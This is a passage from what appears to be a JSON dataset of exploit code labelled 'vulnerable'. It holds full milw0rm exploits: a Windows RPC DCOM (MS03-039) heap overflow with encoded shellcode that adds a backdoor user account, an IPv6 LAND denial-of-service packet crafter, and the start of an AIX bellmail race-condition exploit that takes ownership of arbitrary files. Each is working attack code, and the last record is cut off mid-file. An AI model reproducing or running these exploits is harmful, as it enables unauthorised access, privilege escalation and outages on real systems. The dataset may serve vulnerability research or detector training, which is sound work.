x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00\n\n,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00\n\n,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10\n\n,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF\n\n,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10\n\n,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09\n\n,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00\n\n,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00\n\n,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00\n\n,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00\n\n,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00\n\n,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E\n\n,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00\n\n,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00\n\n,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00\n\n,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00\n\n,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00\n\n,0x00,0x00,0x00,0x00,0x00,0x00};\n\n\n\nunsigned char request2[]={\n\n0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00\n\n,0x00,0x00,0x5C,0x00,0x5C,0x00};\n\n\n\nunsigned char request3[]={\n\n0x5C,0x00\n\n,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00\n\n,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00\n\n,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00\n\n,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};\n\n\n\n//user=\"e\" pass=\"asd#321\"\n\nunsigned char sc_add_user[]=\n\n\"\\xEB\\x10\\x5A\\x4A\\x33\\xC9\\x66\\xB9\\x3E\\x01\\x80\\x34\\x0A\\x99\\xE2\\xFA\"\n\n\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\\x70\\x31\\x99\\x99\\x99\\xC3\\x21\\x95\\x69\"\n\n\"\\x64\\xE6\\x12\\x99\\x12\\xE9\\x85\\x34\\x12\\xD9\\x91\\x12\\x41\\x12\\xEA\\xA5\"\n\n\"\\x9A\\x6A\\x12\\xEF\\xE1\\x9A\\x6A\\x12\\xE7\\xB9\\x9A\\x62\\x12\\xD7\\x8D\\xAA\"\n\n\"\\x74\\xCF\\xCE\\xC8\\x12\\xA6\\x9A\\x62\\x12\\x6B\\xF3\\x97\\xC0\\x6A\\x3F\\xED\"\n\n\"\\x91\\xC0\\xC6\\x1A\\x5E\\x9D\\xDC\\x7B\\x70\\xC0\\xC6\\xC7\\x12\\x54\\x12\\xDF\"\n\n\"\\xBD\\x9A\\x5A\\x48\\x78\\x9A\\x58\\xAA\\x50\\xFF\\x12\\x91\\x12\\xDF\\x85\\x9A\"\n\n\"\\x5A\\x58\\x78\\x9B\\x9A\\x58\\x12\\x99\\x9A\\x5A\\x12\\x63\\x12\\x6E\\x1A\\x5F\"\n\n\"\\x97\\x12\\x49\\xF3\\x9A\\xC0\\x71\\xBD\\x99\\x99\\x99\\xF1\\x66\\x66\\x66\\x99\"\n\n\"\\xF1\\x99\\x89\\x99\\x99\\xF3\\x9D\\x66\\xCE\\x6D\\x22\\x81\\x69\\x64\\xE6\\x10\"\n\n\"\\x9A\\x1A\\x5F\\x95\\xAA\\x59\\xC9\\xCF\\x66\\xCE\\x61\\xC9\\x66\\xCE\\x65\\xAA\"\n\n\"\\x59\\x35\\x1C\\x59\\xEC\\x60\\xC8\\xCB\\xCF\\xCA\\x66\\x4B\\xC3\\xC0\\x32\\x7B\"\n\n\"\\x77\\xAA\\x59\\x5A\\x71\\xCA\\x66\\x66\\x66\\xDE\\xFC\\xED\\xC9\\xEB\\xF6\\xFA\"\n\n\"\\xD8\\xFD\\xFD\\xEB\\xFC\\xEA\\xEA\\x99\\xD1\\xFC\\xF8\\xE9\\xDA\\xEB\\xFC\\xF8\"\n\n\"\\xED\\xFC\\x99\\xCE\\xF0\\xF7\\xDC\\xE1\\xFC\\xFA\\x99\\xDC\\xE1\\xF0\\xED\\xC9\"\n\n\"\\xEB\\xF6\\xFA\\xFC\\xEA\\xEA\\x99\\xFA\\xF4\\xFD\\xB9\\xB6\\xFA\\xB9\\xF7\\xFC\"\n\n\"\\xED\\xB9\\xEC\\xEA\\xFC\\xEB\\xB9\\xFC\\xB9\\xF8\\xEA\\xFD\\xBA\\xAA\\xAB\\xA8\"\n\n\"\\xB9\\xB6\\xF8\\xFD\\xFD\\xB9\\xBF\\xBF\\xB9\\xF7\\xFC\\xED\\xB9\\xF5\\xF6\\xFA\"\n\n\"\\xF8\\xF5\\xFE\\xEB\\xF6\\xEC\\xE9\\xB9\\xF8\\xFD\\xF4\\xF0\\xF7\\xF0\\xEA\\xED\"\n\n\"\\xEB\\xF8\\xED\\xF6\\xEB\\xEA\\xB9\\xFC\\xB9\\xB6\\xF8\\xFD\\xFD\\x99\";\n\n#define\tsc_offset\t\t0x24\n\n#define\tsc_max\t\t\t0x208\n\n#define\tjmp_addr_offset\tsc_max+sc_offset+0x8\n\n#define\ttop_seh_offset\tjmp_addr_offset+0x4\n\n\n\nunsigned char sc[]=\n\n\"\\x31\\x00\\x32\\x00\\x37\\x00\\x2e\\x00\\x30\\x00\\x2e\\x00\"\n\n\"\\x30\\x00\\x2e\\x00\\x31\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\"\n\n\"\\x43\\x00\\x24\\x00\\x5c\\x00\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\"\n\n\"\\xe9\\xf3\\xfd\\xff\\xff\"\n\n\"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\";\n\n\n\nunsigned char request4[]={\n\n0x01,0x10\n\n,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00\n\n,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C\n\n,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n};\n\n\n\nstruct\n\n{\n\n\tchar\t*os;\n\n\tDWORD\tdwTopSeh;\n\n\tchar\t*seh;\n\n\tDWORD\tdwJmpAddr;\n\n\tchar\t*jmp;\n\n}\n\ntargets[] =\n\n{\n\n\t{ \"2kEnSp4+MS03-026\", \n\n\t\t0x7c54144c,\n\n\t\t\"kernel32.dll v5.0.2195.6688\",\n\n\t\t0x77a1b496,\n\n\t\t\"OLEAUT32.dll v2.40.4522.0\"},\n\n\t{ \"2kEnSp3+SomeHotFixs+MS03-026\", \n\n\t\t0x77eda1f0,\n\n\t\t\"kernel32.dll v5.0.2195.6079\",\n\n\t\t0x77a1afa9,\n\n\t\t\"OLEAUT32.dll v2.40.4518.0\"}\n\n}, v;\n\nvoid main(int argc,char ** argv)\n\n{\n\n    WSADATA WSAData;\n\n    SOCKET sock;\n\n    int len,len1;\n\n    SOCKADDR_IN addr_in;\n\n    short port=135;\n\n    unsigned char buf1[0x1000];\n\n    unsigned char buf2[0x1000];\n\n\tint\ti, iType;\n\n\n\n\tprintf( \"MS03-039 RPC DCOM long filename heap buffer overflow exp v1\\n\"\n\n\t\t\t\"Base on flashsky's MS03-026 exp\\n\"\n\n\t\t\t\"Code by ey4s<eyas#xfocus.org>\\n\"\n\n\t\t\t\"2003-09-16\\n\"\n\n\t\t\t\"Welcome to http://www.xfocus.net\\n\"\n\n\t\t\t\"Thanks to flashsky & benjurry & Dave Aitel\\n\"\n\n\t\t\t\"If success, target will add a user \\\"e\\\" and password is \\\"asd#321\\\"\\n\\n\");\n\n\n\n\tif(argc!=3)\n\n\t{\n\n\t\tprintf(\"Usage: %s <target> <type>\\n\", argv[0]);\n\n\t\tfor(i = 0; i < sizeof(targets)/sizeof(v); i++)\n\n\t\t\tprintf( \"<%d>   %s\\n\"\n\n\t\t\t\t\t\"      TopSeh=0x%.8x in %s\\n\"\n\n\t\t\t\t\t\"      JmpAddr=0x%.8x in %s\\n\",\n\n\t\t\t\t\ti, targets[i].os,\n\n\t\t\t\t\ttargets[i].dwTopSeh, targets[i].seh,\n\n\t\t\t\t\ttargets[i].dwJmpAddr, targets[i].jmp);\n\n\t\treturn;\n\n\t}\n\n\n\n\tiType = atoi(argv[2]);\n\n\tif((iType<0) || iType > sizeof(targets)/sizeof(v))\n\n\t{\n\n\t\tprintf(\"[-] Wrong type.\\n\");\n\n\t\treturn;\n\n\t}\n\n\n\n\tmemcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user));\n\n\tmemcpy(&sc[jmp_addr_offset], &targets[iType].dwJmpAddr,4);\n\n\tmemcpy(&sc[top_seh_offset], &targets[iType].dwTopSeh,4);\n\n\tprintf(\"[+] Prepare shellcode completed.\\n\");\n\n\n\n    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)\n\n    {\n\n        printf(\"WSAStartup error.Error:%d\\n\",WSAGetLastError());\n\n        return;\n\n    }\n\n\n\n    addr_in.sin_family=AF_INET;\n\n    addr_in.sin_port=htons(port);\n\n    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);\n\n    \n\n    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)\n\n    {\n\n        printf(\"Socket failed.Error:%d\\n\",WSAGetLastError());\n\n        return;\n\n    }\n\n    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)\n\n    {\n\n        printf(\"Connect failed.Error:%d\",WSAGetLastError());\n\n        return;\n\n    }\n\n\tprintf(\"[+] Connect to %s:135 success.\\n\", argv[1]);\n\n\n\n\tif(sizeof(sc_add_user) > sc_max)\n\n\t{\n\n\t\tprintf(\"[-] shellcode too long, exit.\\n\");\n\n\t\treturn;\n\n\t}\n\n\n\n \n\n    len=sizeof(sc);\n\n    memcpy(buf2,request1,sizeof(request1));\n\n    len1=sizeof(request1);\n\n    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;  //\u00bc\u00c6\u00cb\u00e3\u00ce\u00c4\u00bc\u00fe\u00c3\u00fb\u00cb\u00ab\u00d7\u00d6\u00bd\u00da\u00b3\u00a4\u00b6\u00c8\n\n    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//\u00bc\u00c6\u00cb\u00e3\u00ce\u00c4\u00bc\u00fe\u00c3\u00fb\u00cb\u00ab\u00d7\u00d6\u00bd\u00da\u00b3\u00a4\u00b6\u00c8\n\n    memcpy(buf2+len1,request2,sizeof(request2));\n\n    len1=len1+sizeof(request2);\n\n    memcpy(buf2+len1,sc,sizeof(sc));\n\n    len1=len1+sizeof(sc);\n\n    memcpy(buf2+len1,request3,sizeof(request3));\n\n    len1=len1+sizeof(request3);\n\n    memcpy(buf2+len1,request4,sizeof(request4));\n\n    len1=len1+sizeof(request4);\n\n    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;\n\n    //\u00bc\u00c6\u00cb\u00e3\u00b8\u00f7\u00d6\u00d6\u00bd\u00e1\u00b9\u00b9\u00b5\u00c4\u00b3\u00a4\u00b6\u00c8\n\n    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;  \n\n    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;\n\n    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;\n\n    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;\n\n    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;\n\n    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;\n\n    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;\n\n\n\n    len = send(sock,bindstr,sizeof(bindstr),0);\n\n\tif(len<=0)\n\n    {\n\n            printf(\"[-] Send failed.Error:%d\\n\",WSAGetLastError());\n\n            return;\n\n    }\n\n \telse\n\n\t\tprintf(\"[+] send %d bytes.\\n\", len);\n\n\t\n\n    len=recv(sock,buf1,1000,0);\n\n\tif(len<=0)\n\n\t{\n\n\t\tprintf(\"[-] recv error:%d\\n\", GetLastError());\n\n\t\treturn;\n\n\t}\n\n\telse\n\n\t\tprintf(\"[+] recv %d bytes.\\n\", len);\n\n\n\n    len = send(sock,buf2,len1,0);\n\n\tif(len<=0)\n\n    {\n\n            printf(\"[-] Send failed.Error:%d\\n\",WSAGetLastError());\n\n            return;\n\n    }\n\n\telse\n\n\t\tprintf(\"[+] send %d bytes.\\n\", len);\n\n    len=recv(sock,buf1,1024,0);\n\n\tif(len<=0)\n\n\t{\n\n\t\tprintf(\"[+] Target crash or exploit success? :)\\n\");\n\n\t}\n\n\telse\n\n\t\tprintf(\"[-] recv %d bytes. Bad luck!\\n\", len);\n\n}\n\n\n\n\n\n\n\n// milw0rm.com [2003-09-16]",
15        "vulnerable": true
16    },
17    {
18        "exploit_id": 1000,
19        "content": "//\n\n// Example usage: LandIpV6 \\Device\\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D} \n\n//fe80::2a1:b0ff:fe08:8bcc 135\n\n//\n\n// Written by: Konrad Malewski.\n\n//\n\n\n\n#include <stdlib.h>\n\n#include <stdio.h>\n\n#include <Winsock2.h>\n\n#include <ws2tcpip.h>\n\n#include <pcap.h>\n\n#include <remote-ext.h>\n\n///////////////////////////////////////////////////////////////////////////////\n\n///////////// from libnet /////////////\n\n/* ethernet addresses are 6 octets long */\n\n#define ETHER_ADDR_LEN 0x6\n\n\n\ntypedef unsigned char u_int8_t;\n\ntypedef unsigned short u_int16_t;\n\ntypedef unsigned int u_int32_t;\n\ntypedef unsigned __int64 u_int64_t;\n\n/*\n\n* Ethernet II header\n\n* Static header size: 14 bytes\n\n*/\n\nstruct libnet_ethernet_hdr\n\n{\n\nu_int8_t ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */\n\nu_int8_t ether_shost[ETHER_ADDR_LEN];/* source ethernet address */\n\nu_int16_t ether_type; /* protocol */\n\n};\n\n\n\nstruct libnet_in6_addr\n\n{\n\nunion\n\n{\n\nu_int8_t __u6_addr8[16];\n\nu_int16_t __u6_addr16[8];\n\nu_int32_t __u6_addr32[4];\n\n} __u6_addr; /* 128-bit IP6 address */\n\n};\n\n\n\n\n\n/*\n\n* IPv6 header\n\n* Internet Protocol, version 6\n\n* Static header size: 40 bytes\n\n*/\n\nstruct libnet_ipv6_hdr\n\n{\n\nu_int8_t ip_flags[4]; /* version, traffic class, flow label */\n\nu_int16_t ip_len; /* total length */\n\nu_int8_t ip_nh; /* next header */\n\nu_int8_t ip_hl; /* hop limit */\n\nstruct libnet_in6_addr ip_src, ip_dst; /* source and dest address */\n\n\n\n};\n\n\n\n/*\n\n* TCP header\n\n* Transmission Control Protocol\n\n* Static header size: 20 bytes\n\n*/\n\nstruct libnet_tcp_hdr\n\n{\n\nu_int16_t th_sport; /* source port */\n\nu_int16_t th_dport; /* destination port */\n\nu_int32_t th_seq; /* sequence number */\n\nu_int32_t th_ack; /* acknowledgement number */\n\nu_int8_t th_x2:4, /* (unused) */\n\nth_off:4; /* data offset */\n\n\n\nu_int8_t th_flags; /* control flags */\n\nu_int16_t th_win; /* window */\n\nu_int16_t th_sum; /* checksum */\n\nu_int16_t th_urp; /* urgent pointer */\n\n};\n\n\n\nint libnet_in_cksum(u_int16_t *addr, int len)\n\n{\n\nint sum;\n\nunion\n\n{\n\nu_int16_t s;\n\nu_int8_t b[2];\n\n}pad;\n\nsum = 0;\n\nwhile (len > 1)\n\n{\n\nsum += *addr++;\n\nlen -= 2;\n\n}\n\nif (len == 1)\n\n{\n\npad.b[0] = *(u_int8_t *)addr;\n\npad.b[1] = 0;\n\nsum += pad.s;\n\n}\n\nreturn (sum);\n\n}\n\n#define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) \n\n& 0xffff))\n\n\n\n///////////////////////////////////////////////////////////////////////////////\n\n///////////////////////////////////////////////////////////////////////////////\n\nu_char packet[74];\n\nstruct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14);\n\nstruct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54);\n\nstruct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet;\n\n\n\nu_char errbuf[1024];\n\npcap_t *pcap_handle;\n\n\n\n\n\nvoid usage(char* n)\n\n{\n\npcap_if_t * alldevs,*d;\n\nint i=1;\n\nfprintf(stdout,\"Usage:\\n\"\n\n\"\\t %s <device> <victim> <port>\\n\",n);\n\n\n\nif (pcap_findalldevs (&alldevs, (char*)errbuf) == -1)\n\n{\n\nfprintf( stderr, \"Error in pcap_findalldevs ():%s\\n\" ,errbuf);\n\nexit(EXIT_FAILURE);\n\n}\n\nprintf(\"Avaliable adapters: \\n\");\n\nd = alldevs;\n\nwhile (d!=NULL)\n\n{\n\nprintf(\"\\t%d) %s\\n\\t\\t%s\\n\",i++,d->name,d->description);\n\nd = d->next;\n\n}\n\npcap_freealldevs (alldevs);\n\n}\n\n///////////////////////////////////////////////////////////////////////////////\n\nint main(int argc, char* argv[])\n\n{\n\nif ( argc<4 )\n\n{\n\nusage(argv[0]);\n\nreturn EXIT_FAILURE;\n\n}\n\n\n\nint retVal;\n\nstruct addrinfo hints,*addrinfo;\n\n\n\nZeroMemory(&hints,sizeof(hints));\n\n\n\nWSADATA wsaData;\n\nif ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR )\n\n{\n\nfprintf( stderr, \"Error in WSAStartup():%d\\n\",WSAGetLastError());\n\nreturn EXIT_FAILURE;\n\n}\n\n//\n\n// Get MAC address of remote host (assume link local IpV6 address)\n\n//\n\n\n\nhints.ai_family = PF_INET6;\n\nhints.ai_socktype = SOCK_STREAM;\n\nhints.ai_protocol = IPPROTO_TCP;\n\nhints.ai_flags = AI_PASSIVE;\n\n\n\nretVal = getaddrinfo(argv[2],0, &hints, &addrinfo);\n\nif ( retVal!=0 )\n\n{\n\nWSACleanup();\n\nfprintf( stderr, \"Error in getaddrinfo():%d\\n\",WSAGetLastError());\n\nexit(EXIT_FAILURE);\n\n}\n\n\n\n//\n\n// Open WinPCap adapter\n\n//\n\nif ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS, \n\n100, (char*)errbuf)) == NULL )\n\n{\n\nfreeaddrinfo(addrinfo);\n\nWSACleanup();\n\nfprintf(stderr, \"Error opening device: %s\\n\",argv[1]);\n\nreturn EXIT_FAILURE;\n\n}\n\n\n\nZeroMemory(packet,sizeof(packet));\n\nstruct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr;\n\n\n\n// fill ethernet header\n\neth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like \n\n00:something;\n\neth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9];\n\neth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10];\n\neth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13];\n\neth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14];\n\neth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15];\n\neth_hdr->ether_type = 0xdd86;\n\n\n\n\n\n// fill IP header\n\n// source ip == destination ip\n\n\n\nmemcpy(ip6_hdr->ip_src.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));\n\n\n\nmemcpy(ip6_hdr->ip_dst.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));\n\nip6_hdr->ip_hl = 255;\n\nip6_hdr->ip_nh = IPPROTO_TCP;\n\nip6_hdr->ip_len = htons (20);\n\nip6_hdr->ip_flags[0] = 0x06 << 4;\n\nsrand((unsigned int) time(0));\n\n// fill tcp header\n\ntcp_hdr->th_sport = tcp_hdr->th_dport = htons (atoi(argv[3])); // source \n\nport equal to destination\n\ntcp_hdr->th_seq = rand();\n\ntcp_hdr->th_ack = rand();\n\ntcp_hdr->th_off = htons(5);\n\ntcp_hdr->th_win = rand();\n\ntcp_hdr->th_sum = 0;\n\ntcp_hdr->th_urp = htons(10);\n\ntcp_hdr->th_off = 5;\n\ntcp_hdr->th_flags = 2;\n\n// calculate tcp checksum\n\nint chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32);\n\nchsum += ntohs (IPPROTO_TCP + sizeof (struct libnet_tcp_hdr));\n\nchsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct \n\nlibnet_tcp_hdr));\n\ntcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum);\n\n// send data to wire\n\nretVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet));\n\nif ( retVal == -1 )\n\n{\n\nfprintf(stderr,\"Error writing packet to wire!!\\n\");\n\n}\n\n//\n\n// close adapter, free mem.. etc..\n\n//\n\npcap_close(pcap_handle);\n\nfreeaddrinfo(addrinfo);\n\nWSACleanup();\n\nreturn EXIT_SUCCESS;\n\n}\n\n\n\n// milw0rm.com [2005-05-17]",
20        "vulnerable": true
21    },
22    {
23        "exploit_id": 1001,
24        "content": "-bash-2.05b$\n\n-bash-2.05b$ cat x_aix5_bellmail.pl\n\n#!/usr/bin/perl\n\n# FileName: x_aix5_bellmail.pl\n\n# Exploit \"Race condition vulnerability (BUGTRAQ  ID: 8805)\" of /usr/bin/bellmail\n\n#         command on Aix5 to change any file owner to current user.\n\n#\n\n#Usage    : x_aix5_bellmail.pl aim_file\n\n#           aim_file : then file wich you want to chown to you.\n\n#    Note : Maybe you should run more than one to \"Race condition\".\n\n#           The file named \"x_bell.sh\" can help you to use this exp.\n\n#           You should type \"w\" \"Enter\" then \"q\"  \"Enter\" key on keyboard\n\n#          as fast as you can when bellmail prompt \"?\" appear.\n\n#\n\n# Author  : watercloud@xfocus.org\n\n#     XFOCUS Team    \n\n#     http://www.xfocus.net   (CN)\n\n#     http://www.xfocus.org   (EN)\n\n#\n\n# Date    : 2004-6-6\n\n# Tested  : on  Aix5.1.\n\n# Addition: IBM had offered a patch named \"IY25661\" for it.\n\n# Announce: use as your owner risk!\n\n\n\n$CMD=\"/usr/bin/bellmail\";\n\n$MBOX=\"$ENV{HOME}/mbox\";\n\n$TMPFILE=\"/tmp/.xbellm.tmp\";\n\n\n\n$AIM_FILE = shift @ARGV ;\n\n$FORK_NUM = 1000;\n\n\n\ndie \"AIM FILE \\\"$AIM_FILE\\\" not exist.\\n\" if ! -e $AIM_FILE;\n\n\n\nunlink $MBOX;\n\nsystem \"echo abc > $TMPFILE\";\n\nsystem \"$CMD $ENV{LOGIN} < $TMPFILE\";\n\nunlink $TMPFILE;\n\n\n\n$ret=`ls -l $AIM_FILE\"`;\n\nprint \"Before: $ret\";\n\n\n\nif( fork()==0 )\n\n{\n\n        &deamon($FORK_NUM);\n\n        exit 0 ;\n\n}\n\nsleep( (rand()*100)%4);\n\nexec $CMD;\n\n\n\n$ret=`ls -l $AIM_FILE\"`;\n\nprint \"Now: $ret\";\n\n\n\nsub deamon {\n\n        $num = shift || 1;\n\n        for($i=0;$i<$num;$i++) {\n\n                &do_real() if fork()==0;\n\n        }\n\n}\n\nsub do_real {\n\n        if(-e $MBOX) {\n\n                unlink $MBOX ;\n\n                symlink \"$AIM_FILE\",$MBOX;\n\n        }\n\n        exit 0;\n\n}\n\n#EOF\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n-bash-2.05b$\n\n-bash-2.05b$ cat 